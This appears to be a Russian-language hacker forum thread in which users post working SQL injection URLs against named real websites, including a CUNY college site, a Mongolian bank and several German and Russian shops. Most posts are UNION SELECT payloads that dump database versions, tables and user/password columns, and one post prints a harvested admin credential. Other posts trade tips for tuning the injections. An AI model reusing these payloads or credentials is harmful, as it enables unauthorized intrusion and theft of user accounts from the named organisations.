SQL Инъекции

Произведение команды Sоlоx

оч интересная базюка

Code:

http://www.flowers.kg/rus/index.php?mode=showother&id=-23+union+select+1,2,concat_ws(0x3a,table_name,table_schema,version(),database()),4+from+information_schema.tables

там еще лежат заготовки к базам всех проектов этой студии ))

хмм, только вот ничо путевого там не нашел

 

sbornikmp3.ru

Code:

http://www.sbornikmp3.ru/details.php?album=58869+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15+--+

Прошелся по названием таблиц из соседней темы, не одной таблицы не подобрал

 

Oracle.

www.bmcc.cuny.edu

Версия:

Code:

http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,banner,1+from+v$version--&dep=

CORE 10.1.0.3.0 Production
NLSRTL Version 10.1.0.3.0 - Production
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
TNS for Linux: Version 10.1.0.3.0 - Production

Таблицы:

Code:

http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,table_name,1+from+sys.all_tables--&dep=

интересная USERS

Столбцы:

Code:

http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,column_name,1+from+sys.all_tab_columns--&dep=

username, password

Вытаскиваем:

Code:

http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,concat(username,concat(chr(59),password)),1+from+users--&dep=

admin;lrc_01

 

Code:

http://www.newmind.ru/index.php?cat_id=-40+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+20,1/*

 

Интернет-магазин парфюмерии Zemen :/

 

Code:

http://www.ascon.ru/order.php?id=-11+union+select+1,2,table_name,4,5+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*

хостинг:

Code:

http://www.officinaweb.com/hosting.php?id=-5+union+select+1,2,3,4/*

 

sharelita.com
4.1.21-standard:testnkel_onkel@localhost

Code:

http://sharelita.com/file.php?fileid=-16312+UNION+SELECT+1,2,concat(name,char(58),password,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+from+users+--+

 

На этом сайте уже обнаружена инекция
http://forum.antichat.ru/showthread.php?p=438529#post438529

ты просто нашёл на таком же файле,просто с больше количеством таблиц

 

Code:

http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,user,password,6+from+mysql.user/*

 

новости шоубизнеса

кому интересно копаем

код:
http://popzvezda.com/showbiz/?n=-7271+union+select+1,2,version(),4,5,6,7+from+showbiz/*

5.0.27-log

 

Code:

http://www.umzug.cn/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*

Code:

http://online-geldverdienen24.de/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*

Code:

http://links.1a-chat.com/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*

Code:

http://www.kaufguenstigerein.de/start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*

Code:

http://www.eliste.eu/start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*

 

Code:

http://popzvezda.com/showbiz/?n=-7271+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables/*

работай лимитом ( limit ) +2 и т.д)

 

Code:

http://www.bioinnovit.com/scientist_model_agreements_contracts.php?mode=view&purchase_id='+union+select+1,user(),3,4,5,6,7,8,9,10,database(),version()+user/*

Не могу подобрать поля

 

Odeon Film AG

http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,concat(version(),char(58),database(),char(58),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+users/*

 

_http://www.caac.org.au/pr/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*

 

2 RAUL07 Если ты не нашел куда подставить эти данные, то вот сюда. А вот что там я не знаю т.к. в немецком ноль (а это вроде немецкий).
http://www.umzug.cn/start.php?go=in_admin
Пока писал уже поменяли пост. Как удалить свой хз...

 

http://ru-board.com

Code:

http://ru-board.com/new/article.php?sid=[sql]

1 поле, blind-sql =\

 

Code:

http://www.cardholder.kz/index.php?p=-27+union+select+login,email,pwd,4,5,6,7,8,9,10,11,12,13,14+from+users/*

 

MONGOL POSTBANK

Code:

http://www.[COLOR=RoyalBlue]postbank[/COLOR].mn/eng/index.php?ac=news&newsid=650000%20union%20select%201,2,3,4,concat(user,char(58),password),6,7,8%20from%20mysql.user/*

 

http://www.alt.ac.uk/workshop_detail.php?e=-181+union+select+user(),2,3,4,5,6/*